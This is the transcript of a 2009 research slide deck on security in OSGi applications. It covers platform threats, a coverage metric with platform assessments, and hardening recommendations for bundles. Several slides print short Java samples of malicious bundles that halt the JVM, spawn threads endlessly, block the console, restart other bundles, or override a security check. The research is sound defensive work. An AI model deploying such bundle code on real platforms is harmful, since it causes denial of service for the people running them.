security in osgi applications: robust osgi platforms, secure bundles

27
RESEARCH ON YOUR BEHALF Security in OSGi applications: Robust OSGi Platforms, secure Bundles 27.10.2009 Pierre Parrend [email protected]

Upload: kai-hackbarth

Post on 01-Jul-2015

2.089 views

Category:

Documents


4 download

TRANSCRIPT

Page 1: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

RESEARCH ON YOUR BEHALF

Security in OSGi applications: Robust OSGi Platforms, secure Bundles

27.10.2009

Pierre [email protected]

Page 2: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

2 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

The vision

Dynamic applications What happens if the WebCam Driver is a Malware ?

PDA

ComponentRepository

WebCam

SOP Platform(installed on the PDA)

DriverLister Bundle

WebCamDriverBundle

1.2.

PDA

WebCam

DriverLister Bundle

3.

SOP Platform(installed on the PDA)

WebCamDriverBundle

Page 3: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

• OSGi as application server• Integration of open source bundles from several sources• Abuse cases• Attacks through the web front end• Backdoor bundles inside the server

Jboss, Server-side Eclipse

• Validation of open source code• Three levels• Access from a secure repository• Basic security analysis of code• TÜV Certified security audit: external reach, malicious behavior

Yoxos secure source

Existing applications

3 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

Page 4: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Outline

4 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

Java Security

Assessment method

Robust OSGi Platforms

Secure Bundles

An integration

Page 5: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

The Bytecode validation process

Java1: Do not trust the Bytecode

5 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

Page 6: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

JDK 1.1 JDK 1.2

Java2: From the Sandbox to Permission Domains

6 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

[LiGong1997]

Page 7: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Exploitation of the platform

Exploitation of the 3d party bundles

OSGi-based Applications: Threats

7 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

Page 8: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Outline

8 27.07.2009

Java Security

Assessment method

Robust OSGi Platforms

Secure Bundles

An integration

Page 9: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

The Coverage Metric• Percentage of the known vulnerabilities that are protected

• Based on the Attack Surface metric

• Enables to o Assess individual security mechanism

o Compare execution environments

A Metric for Security Protection

9 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

C

Page 10: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Outline

10 27.07.2009

Java Security

Assessment method

Robust OSGi Platforms

Secure Bundles

An integration

Page 11: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Security Issues in OSGi Platforms

The OSGi Platform Threats

Denial of service• Platform stop

• Resource consumption

• Blocking the console

Undue access• Bundle Management

• Bundle code

11 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

Life-cycle layer

JVM

Module layer

Service layer

Host

Page 12: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Stopping the Platform

Stop your application

Simple example• Bundelized application

Just crash it

Thread management features do not help

Bytecode Forgery is another way to crash the JVM

12 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

public class RuntimeHaltActivator implements BundleActivator{

public void start(BundleContext context){

Runtime.getRuntime().halt(0);}

}

public class Stopper extends Thread{

public void run(){Stopper tt = new Stopper();tt.start();Stopper tt2 = new Stopper();tt2.start();Stopper tt3 = new Stopper();tt3.start();

}}

Page 13: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Blocking the console

Simply sleepy

Management actions no longer possible

Resource greedy

Also consume most of the available CPU

13 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

public class SleepingBundleActivator implements BundleActivator{

public void start(BundleContext context){

try{int sec = 50;Thread.sleep(sec * 1000);

}catch(InterruptedException e){e.printStackTrace();}

}}

public class InfStartupLoopActivator implements BundleActivator{

public void start(BundleContext context){

while(1==1){}}

}

Page 14: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Playing with the bundles of your neighbour applications

27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles14

public class PiratBundleManagerActivator implements BundleActivator{

public void start(BundleContext context){try {Bundle[] bundleList = context.getBundles();String symbolicName;for(int i=0; i < bundleList.length ; i++) {

symbolicName = bundleList[i].getSymbolicName();bundleList[i].stop();bundleList[i].start();

}}catch(Exception e) {e.printStackTrace();}

}}

Page 15: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

• Consume memory• Fill the disk• Saturate the service registry

Denial of service

• Exploit split packages

Illegal access

Some other issues

15 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

Page 16: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Assessment of OSGi Platforms

16 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

Platform Type # of protected Vulns

# of identified Vulns

Coverage

Concierge 0 28 0 %

Felix 1 32 3,1 %

Knopflerfish 1 31 3,2 %

Equinox 4 31 13 %

Java Permissions 13 32 41 %

Concierge with Permissions 10 28 36 %

Felix with Permissions 14 32 44 %

Knopflerfish with Permissions 14 31 44 %

Equinox with Permissions 17 31 55 %

Page 17: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Protection Rate: 25 % for the ‘Malicious Bundles’ catalog entries

Hardened OSGi

17 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

• Check component size before download, and control the cumulated size of loaded components

• Check digital signature at install time• Launch the component activator in a separate Thread• Limit the number of registered services

Introduces

• Do not reject harmless unnecessary metadata• Remove all component data from disk at

uninstallation

SystematizesHardened OSGi

Host

Page 18: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Outline

18 27.07.2009

Java Security

Assessment method

Robust OSGi Platforms

Secure Bundles

An integration

Page 19: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

• Shared resources exposed• Vulnerabilities can be directly exploited

• Internal code can have more relaxed constraints

OSGi bundles

Security Issues in OSGi Bundles

19 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

Shared Objects

SharedClasses

InternalCode

Page 20: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Point of view of the architecture

More issues• Enforcement of component life-cycle

• Denial of service

Security Issues in OSGi Bundles

20 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

VM

Client

Isolation from the user

Isolation between components

Isolation from the environmentAccess control

Page 21: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Access Control

Weak class Abuse

Generic issue to Java

21 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

public class AlmostSecure{public AlmostSecure(){

this.init();}

protected void init(){SecurityManager.check();

}}

public class AlmostSecureOverriden {public AlmostSecure(){

super();}

protected void init(){}

}

Page 22: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Isolation between components

The service who likes to be manipulated

Similar issues with static variables, mutable variables

The not so private data

Corrected in Java 5

22 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

public class HelloWorldServiceImpl implements HelloWorldService{

public final String[] myData={„Param1",„Param2"};

public void helloWorld() {System.out.println("Hello World");}

}

package fr.inria.ares.helloworld;public class HelloWorld{

private class HelloWorldPrinter {private String textHello="HelloWorld";

}}

Page 23: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

A controversial example• Synchronized code

• Do you consider this a vulnerability ?

Denial-of-Service

23 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

Page 24: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Recommendations (1/3)

27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles24

• only have dependencies on bundles they trust• never used synchronized statements that rely on third

party code• provide a hardened public code implementation following

given recommendations

Bundles should

Page 25: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

• provide only final static non-mutable fields• set security manager calls during creation in all required

places at the beginning of the method• all constructors• clone() method if the class is cloneable• readObject(ObjectInputStream) if the class is serializable

• have security check in final methods only

Shared Classes should

Recommendations (2/3)

25 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

Page 26: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Recommendations (3/3)

26 27.07.2009Pierre Parrend – OSGi: Secure Platforms, secure bundles

• only have basic types and serializable final types as parameter

• perform copy and validation of parameters before using them• perform data copy before returning a given object in a method• returned object should be either a basic type or serializable.

• not use Exception that carry any configuration information, and not serialize data unless a specific security mechanism is available

• never execute sensitive operations on behalf of other components.

Shared Objects (OSGi Services) should

Page 27: Security in OSGi applications: Robust OSGi Platforms, secure Bundles

Contact

27

Dr. Pierre ParrendSenior Scientist

FZI Forschungszentrum Informatik Haid-und-Neu-Str. 10-14D-76131 KarlsruheTel.: +49-721-9654-620Fax: +49-721-9654-621http://www.fzi.de/se

FZI Software Engineering Domainhttp://www.fzi.de/se